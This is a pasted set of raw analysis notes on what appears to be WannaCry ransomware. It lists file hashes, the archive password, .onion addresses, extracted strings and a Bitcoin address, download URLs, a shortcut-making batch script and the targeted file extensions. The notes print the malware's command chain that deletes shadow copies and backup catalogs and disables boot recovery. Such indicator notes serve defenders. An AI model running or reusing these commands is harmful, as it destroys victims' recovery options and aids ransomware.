API tools faq
paste
Advertisement
Guest User

something

a guest
May 12th, 2017
20,775
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.14 KB
Copied copy raw download clone embed print report
  1. md5: 509C41EC97BB81B0567B059AA2F50FE8
  2.  
  3. Holds Resource .zip:
  4. MD5: 5b225149abb8c8eb245445f707e6f0d2
  5. Pass: WNcry@2ol7
  6.  
  7. Contains
  8. b.wnry c17170262312f3be7027bc2ca825bf0c
  9. c.wnry ae08f79a0d800b82fcbe1b43cdbdbefc
  10. r.wnry 3e0020fc529b1c2a061016dd2469ba96
  11. t.wnry 5dcaac857e695a65f5c3ef1441a73a8f
  12. taskdl.exe 4fef5e34143e646dbf9907c4374276f5
  13. taskse.exe 8495400f199ac77853c53b5a3f278f3e
  14. u.wnry 7bf2b57f2a205768755c07f238fb32cc
  15. m_bulgarian.wnry 95673b0f968c0f55b32204361940d184
  16. m_chinese (simplified).wnry 0252d45ca21c8e43c9742285c48e91ad
  17. m_chinese (traditional).wnry 2efc3690d67cd073a9406a25005f7cea
  18. m_croatian.wnry 17194003fa70ce477326ce2f6deeb270
  19. m_czech.wnry 537efeecdfa94cc421e58fd82a58ba9e
  20. m_danish.wnry 2c5a3b81d5c4715b7bea01033367fcb5
  21. m_dutch.wnry 7a8d499407c6a647c03c4471a67eaad7
  22. m_english.wnry fe68c2dc0d2419b38f44d83f2fcf232e
  23. m_filipino.wnry 08b9e69b57e4c9b966664f8e1c27ab09
  24. m_finnish.wnry 35c2f97eea8819b1caebd23fee732d8f
  25. m_german.wnry 3d59bbb5553fe03a89f817819540f469
  26. m_greek.wnry fb4e8718fea95bb7479727fde80cb424
  27. m_indonesian.wnry 3788f91c694dfc48e12417ce93356b0f
  28. m_italian.wnry 30a200f78498990095b36f574b6e8690
  29. m_japanese.wnry b77e1221f7ecd0b5d696cb66cda1609e
  30. m_korean.wnry 6735cb43fe44832b061eeb3f5956b099
  31. m_latvian.wnry c33afb4ecc04ee1bcc6975bea49abe40
  32. m_norwegian.wnry ff70cc7c00951084175d12128ce02399
  33. m_polish.wnry e79d7f2833a9c2e2553c7fe04a1b63f4
  34. m_portuguese.wnry fa948f7d8dfb21ceddd6794f2d56b44f
  35. m_romanian.wnry 313e0ececd24f4fa1504118a11bc7986
  36. m_russian.wnry 452615db2336d60af7e2057481e4cab5
  37. m_slovak.wnry c911aba4ab1da6c28cf86338ab2ab6cc
  38. m_spanish.wnry 8d61648d34cba8ae9d1e2a219019add1
  39. m_swedish.wnry c7a19984eb9f37198652eaf2fd1ee25c
  40. m_turkish.wnry 531ba6b1a5460fc9446946f91cc8c94b
  41. m_vietnamese.wnry 8419be28a0dcec3f55823620922b00fa
  42.  
  43. Onions :
  44. gx7ekbenv2riucmf.onion
  45. 57g7spgrzlojinas.onion
  46. xxlvbrloxvriy2c5.onion
  47. 76jdd2ir2embyv47.onion
  48. cwwnhwhlz52maqm7.onion
  49.  
  50.  
  51. Script from memory :
  52. 0x1000d628, 218, @echo off
  53. echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
  54. echo SET om = ow.CreateShortcut("%s%s")>> m.vbs
  55. echo om.TargetPath = "%s%s">> m.vbs
  56. echo om.Save>> m.vbs
  57. cscript.exe //nologo m.vbs
  58. del m.vbs
  59.  
  60.  
  61.  
  62.  
  63. u.wnry :
  64.  
  65. .data:00420FD8 aCVssadminDelet db '/c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet'
  66.  
  67.  
  68. aFailedToSendYo db 'Failed to send your message!',0Ah
  69. .data:00421318 ; char aYourMessageHas[]
  70. .data:00421318 aYourMessageHas db 'Your message has been sent successfully!',0
  71. .data:00421344 ; char aYouAreSendingT[]
  72. .data:00421344 aYouAreSendingT db 'You are sending too many mails! Please try again %d minutes later'
  73.  
  74.  
  75.  
  76. Process:
  77. 00:34 < nulldot> 0x1000ef48, 24, BAYEGANSRV\administrator
  78. 00:34 < nulldot> 0x1000ef7a, 13, Smile465666SA
  79. 00:34 < nulldot> 0x1000efc0, 19, wanna18@hotmail.com
  80. 00:34 < nulldot> 0x1000eff2, 34, 1QAc9S5EmycqjzzWDc1yiWzr9jJLC8sLiY
  81. 00:34 < nulldot> 0x1000f024, 22, sqjolphimrr7jqw6.onion
  82. 00:34 < nulldot> 0x1000f088, 52, https://www.dropbox.com/s/deh8s52zazlyy94/t.zip?dl=1
  83. 00:34 < nulldot> 0x1000f0ec, 67, https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
  84. 00:34 < nulldot> 0x1000f150, 52, https://www.dropbox.com/s/c1gn29iy8erh1ks/m.rar?dl=1
  85. 00:34 < nulldot> 0x1000f1b4, 12, 00000000.eky
  86. 00:34 < nulldot> 0x1000f270, 12, 00000000.pky
  87. 00:34 < nulldot> 0x1000f2a4, 12, 00000000.res
  88.  
  89.  
  90.  
  91. Target_Files:
  92. data:1000D1F8 aCryptacquireco db 'CryptAcquireContextA',0 ; DATA XREF: sub_10004440+2Do
  93. .data:1000D20D align 10h
  94. .data:1000D210 dd offset a_doc ; ".doc"
  95. .data:1000D214 dd offset a_docx ; ".docx"
  96. .data:1000D218 dd offset a_xls ; ".xls"
  97. .data:1000D21C dd offset a_xlsx ; ".xlsx"
  98. .data:1000D220 dd offset a_ppt ; ".ppt"
  99. .data:1000D224 dd offset a_pptx ; ".pptx"
  100. .data:1000D228 dd offset a_pst ; ".pst"
  101. .data:1000D22C dd offset a_ost ; ".ost"
  102. .data:1000D230 dd offset a_msg ; ".msg"
  103. .data:1000D234 dd offset a_eml ; ".eml"
  104. .data:1000D238 dd offset a_vsd ; ".vsd"
  105. .data:1000D23C dd offset a_vsdx ; ".vsdx"
  106. .data:1000D240 dd offset a_txt ; ".txt"
  107. .data:1000D244 dd offset a_csv ; ".csv"
  108. .data:1000D248 dd offset a_rtf ; ".rtf"
  109. .data:1000D24C dd offset a_123 ; ".123"
  110. .data:1000D250 dd offset a_wks ; ".wks"
  111. .data:1000D254 dd offset a_wk1 ; ".wk1"
  112. .data:1000D258 dd offset a_pdf ; ".pdf"
  113. .data:1000D25C dd offset a_dwg ; ".dwg"
  114. .data:1000D260 dd offset a_onetoc2 ; ".onetoc2"
  115. .data:1000D264 dd offset a_snt ; ".snt"
  116. .data:1000D268 dd offset a_jpeg ; ".jpeg"
  117. .data:1000D26C dd offset a_jpg ; ".jpg"
  118. .data:1000D274 dd offset a_docb ; ".docb"
  119. .data:1000D278 dd offset a_docm ; ".docm"
  120. .data:1000D27C dd offset a_dot ; ".dot"
  121. .data:1000D280 dd offset a_dotm ; ".dotm"
  122. .data:1000D284 dd offset a_dotx ; ".dotx"
  123. .data:1000D288 dd offset a_xlsm ; ".xlsm"
  124. .data:1000D28C dd offset a_xlsb ; ".xlsb"
  125. .data:1000D290 dd offset a_xlw ; ".xlw"
  126. .data:1000D294 dd offset a_xlt ; ".xlt"
  127. .data:1000D298 dd offset a_xlm ; ".xlm"
  128. .data:1000D29C dd offset a_xlc ; ".xlc"
  129. .data:1000D2A0 dd offset a_xltx ; ".xltx"
  130. .data:1000D2A4 dd offset a_xltm ; ".xltm"
  131. .data:1000D2A8 dd offset a_pptm ; ".pptm"
  132. .data:1000D2AC dd offset a_pot ; ".pot"
  133. .data:1000D2B0 dd offset a_pps ; ".pps"
  134. .data:1000D2B4 dd offset a_ppsm ; ".ppsm"
  135. .data:1000D2B8 dd offset a_ppsx ; ".ppsx"
  136. .data:1000D2BC dd offset a_ppam ; ".ppam"
  137. .data:1000D2C0 dd offset a_potx ; ".potx"
  138. .data:1000D2C4 dd offset a_potm ; ".potm"
  139. .data:1000D2C8 dd offset a_edb ; ".edb"
  140. .data:1000D2CC dd offset a_hwp ; ".hwp"
  141. .data:1000D2D0 dd offset a_602 ; ".602"
  142. .data:1000D2D4 dd offset a_sxi ; ".sxi"
  143. .data:1000D2D8 dd offset a_sti ; ".sti"
  144. .data:1000D2DC dd offset a_sldx ; ".sldx"
  145. .data:1000D2E0 dd offset a_sldm ; ".sldm"
  146. .data:1000D2E4 dd offset a_sldm ; ".sldm"
  147. .data:1000D2E8 dd offset a_vdi ; ".vdi"
  148. .data:1000D2EC dd offset a_vmdk ; ".vmdk"
  149. .data:1000D2F0 dd offset a_vmx ; ".vmx"
  150. .data:1000D2F4 dd offset a_gpg ; ".gpg"
  151. .data:1000D2F8 dd offset a_aes ; ".aes"
  152. .data:1000D2FC dd offset a_arc ; ".ARC"
  153. .data:1000D300 dd offset a_paq ; ".PAQ"
  154. .data:1000D304 dd offset a_bz2 ; ".bz2"
  155. .data:1000D308 dd offset a_tbk ; ".tbk"
  156. .data:1000D30C dd offset a_bak ; ".bak"
  157. .data:1000D310 dd offset a_tar ; ".tar"
  158. .data:1000D314 dd offset a_tgz ; ".tgz"
  159. .data:1000D318 dd offset a_gz ; ".gz"
  160. .data:1000D31C dd offset a_7z ; ".7z"
  161. .data:1000D320 dd offset a_rar ; ".rar"
  162. .data:1000D324 dd offset a_zip ; ".zip"
  163. .data:1000D328 dd offset a_backup ; ".backup"
  164. .data:1000D32C dd offset a_iso ; ".iso"
  165. .data:1000D330 dd offset a_vcd ; ".vcd"
  166. .data:1000D334 dd offset a_bmp ; ".bmp"
  167. .data:1000D338 dd offset a_png ; ".png"
  168. .data:1000D33C dd offset a_gif ; ".gif"
  169. .data:1000D340 dd offset a_raw ; ".raw"
  170. .data:1000D344 dd offset a_cgm ; ".cgm"
  171. .data:1000D348 dd offset a_tif ; ".tif"
  172. .data:1000D34C dd offset a_tiff ; ".tiff"
  173. .data:1000D350 dd offset a_nef ; ".nef"
  174. .data:1000D354 dd offset a_psd ; ".psd"
  175. .data:1000D358 dd offset a_ai ; ".ai"
  176. .data:1000D35C dd offset a_svg ; ".svg"
  177. .data:1000D360 dd offset a_djvu ; ".djvu"
  178. .data:1000D364 dd offset a_m4u ; ".m4u"
  179. .data:1000D368 dd offset a_m3u ; ".m3u"
  180. .data:1000D36C dd offset a_mid ; ".mid"
  181. .data:1000D370 dd offset a_wma ; ".wma"
  182. .data:1000D374 dd offset a_flv ; ".flv"
  183. .data:1000D378 dd offset a_3g2 ; ".3g2"
  184. .data:1000D37C dd offset a_mkv ; ".mkv"
  185. .data:1000D380 dd offset a_3gp ; ".3gp"
  186. .data:1000D384 dd offset a_mp4 ; ".mp4"
  187. .data:1000D388 dd offset a_mov ; ".mov"
  188. .data:1000D38C dd offset a_avi ; ".avi"
  189. .data:1000D390 dd offset a_asf ; ".asf"
  190. .data:1000D394 dd offset a_mpeg ; ".mpeg"
  191. .data:1000D398 dd offset a_vob ; ".vob"
  192. .data:1000D39C dd offset a_mpg ; ".mpg"
  193. .data:1000D3A0 dd offset a_wmv ; ".wmv"
  194. .data:1000D3A4 dd offset a_fla ; ".fla"
  195. .data:1000D3A8 dd offset a_swf ; ".swf"
  196. .data:1000D3AC dd offset a_wav ; ".wav"
  197. .data:1000D3B0 dd offset a_mp3 ; ".mp3"
  198. .data:1000D3B4 dd offset a_sh ; ".sh"
  199. .data:1000D3B8 dd offset a_class ; ".class"
  200. .data:1000D3BC dd offset a_jar ; ".jar"
  201. .data:1000D3C0 dd offset a_java ; ".java"
  202. .data:1000D3C4 dd offset a_rb ; ".rb"
  203. .data:1000D3C8 dd offset a_asp ; ".asp"
  204. .data:1000D3CC dd offset a_php ; ".php"
  205. .data:1000D3D0 dd offset a_jsp ; ".jsp"
  206. .data:1000D3D4 dd offset a_brd ; ".brd"
  207. .data:1000D3D8 dd offset a_sch ; ".sch"
  208. .data:1000D3DC dd offset a_dch ; ".dch"
  209. .data:1000D3E0 dd offset a_dip ; ".dip"
  210. .data:1000D3E4 dd offset a_pl ; ".pl"
  211. .data:1000D3E8 dd offset a_vb ; ".vb"
  212. .data:1000D3EC dd offset a_vbs ; ".vbs"
  213. .data:1000D3F0 dd offset a_ps1 ; ".ps1"
  214. .data:1000D3F4 dd offset a_bat ; ".bat"
  215. .data:1000D3F8 dd offset a_cmd ; ".cmd"
  216. .data:1000D3FC dd offset a_js ; ".js"
  217. .data:1000D400 dd offset a_asm ; ".asm"
  218. .data:1000D404 dd offset a_h ; ".h"
  219. .data:1000D408 dd offset a_pas ; ".pas"
  220. .data:1000D40C dd offset a_cpp ; ".cpp"
  221. .data:1000D410 dd offset a_c ; ".c"
  222. .data:1000D414 dd offset a_cs ; ".cs"
  223. .data:1000D418 dd offset a_suo ; ".suo"
  224. .data:1000D41C dd offset a_sln ; ".sln"
  225. .data:1000D420 dd offset a_ldf ; ".ldf"
  226. .data:1000D424 dd offset a_mdf ; ".mdf"
  227. .data:1000D428 dd offset a_ibd ; ".ibd"
  228. .data:1000D42C dd offset a_myi ; ".myi"
  229. .data:1000D430 dd offset a_myd ; ".myd"
  230. .data:1000D434 dd offset a_frm ; ".frm"
  231. .data:1000D438 dd offset a_odb ; ".odb"
  232. .data:1000D43C dd offset a_dbf ; ".dbf"
  233. .data:1000D440 dd offset a_db ; ".db"
  234. .data:1000D444 dd offset a_mdb ; ".mdb"
  235. .data:1000D448 dd offset a_accdb ; ".accdb"
  236. .data:1000D44C dd offset a_sql ; ".sql"
  237. .data:1000D450 dd offset a_sqlitedb ; ".sqlitedb"
  238. .data:1000D454 dd offset a_sqlite3 ; ".sqlite3"
  239. .data:1000D458 dd offset a_asc ; ".asc"
  240. .data:1000D45C dd offset a_lay6 ; ".lay6"
  241. .data:1000D460 dd offset a_lay ; ".lay"
  242. .data:1000D464 dd offset a_mml ; ".mml"
  243. .data:1000D468 dd offset a_sxm ; ".sxm"
  244. .data:1000D46C dd offset a_otg ; ".otg"
  245. .data:1000D470 dd offset a_odg ; ".odg"
  246. .data:1000D474 dd offset a_uop ; ".uop"
  247. .data:1000D478 dd offset a_std ; ".std"
  248. .data:1000D47C dd offset a_sxd ; ".sxd"
  249. .data:1000D480 dd offset a_otp ; ".otp"
  250. .data:1000D484 dd offset a_odp ; ".odp"
  251. .data:1000D488 dd offset a_wb2 ; ".wb2"
  252. .data:1000D48C dd offset a_slk ; ".slk"
  253. .data:1000D490 dd offset a_dif ; ".dif"
  254. .data:1000D494 dd offset a_stc ; ".stc"
  255. .data:1000D498 dd offset a_sxc ; ".sxc"
  256. .data:1000D49C dd offset a_ots ; ".ots"
  257. .data:1000D4A0 dd offset a_ods ; ".ods"
  258. .data:1000D4A4 dd offset a_3dm ; ".3dm"
  259. .data:1000D4A8 dd offset a_max ; ".max"
  260. .data:1000D4AC dd offset a_3ds ; ".3ds"
  261. .data:1000D4B0 dd offset a_uot ; ".uot"
  262. .data:1000D4B4 dd offset a_stw ; ".stw"
  263. .data:1000D4B8 dd offset a_sxw ; ".sxw"
  264. .data:1000D4BC dd offset a_ott ; ".ott"
  265. .data:1000D4C0 dd offset a_odt ; ".odt"
  266. .data:1000D4C4 dd offset a_pem ; ".pem"
  267. .data:1000D4C8 dd offset a_p12 ; ".p12"
  268. .data:1000D4CC dd offset a_csr ; ".csr"
  269. .data:1000D4D0 dd offset a_crt ; ".crt"
  270. .data:1000D4D4 dd offset a_key ; ".key"
  271. .data:1000D4D8 dd offset a_pfx ; ".pfx"
  272. .data:1000D4DC dd offset a_der ; ".der"
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!